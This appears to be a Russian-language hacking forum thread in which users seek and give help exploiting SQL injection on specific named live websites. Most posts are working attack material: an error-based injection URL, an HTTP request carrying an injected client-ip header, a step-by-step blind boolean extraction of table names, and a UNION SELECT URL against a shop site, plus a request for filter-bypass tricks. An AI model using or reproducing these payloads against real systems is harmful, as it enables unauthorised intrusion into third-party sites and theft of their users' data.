Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается) Думал есть какие нить варианты как в таблице бд поменять значение.
Помогите уважаемые гуру. и так вот сайтик: http://rswow.ru/page.php?p[]=rules Вылазит такая штука Подскажите как то заюзать данную штуку. Заранее спасибо.
mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
Например, так: http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)+--+
и что? ты же не будешь проверить на SQL injection через подставку массива вместо стринга тебе выше показали запрос
Что-нибудь было придумано для решения SQL-инжекций в таких запросах? UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).
http://forum.antichat.ru/showpost.php?p=535989&postcount=4 >24.12.2007, 20:40 Вот я и спрашиваю, а изменилось ли что-нибудь?
вот ссылка в header вписывая client-ip: 1' выходит скуля Но при раскручивании ничего не выявляет и не показывает! Помогите плз!
У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость. Раскрытие пути - http://ttic.ru/modules/counter/mod.php
Code: Host: ttic.ru User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 DNT: 1 Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932 Connection: keep-alive Cache-Control: max-age=0 client-ip: 1' через дополнение mozilla live http replay
Очень интересная инъекция. Один из вариантов решения: client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned") client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)
Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =) client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет Код первого символа - 85
M_cript спасибо за помощь есть ещё вопросик есть скуля,но в ней фильтруется и and и union Code: http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20# как обойти фильтрацию union select?
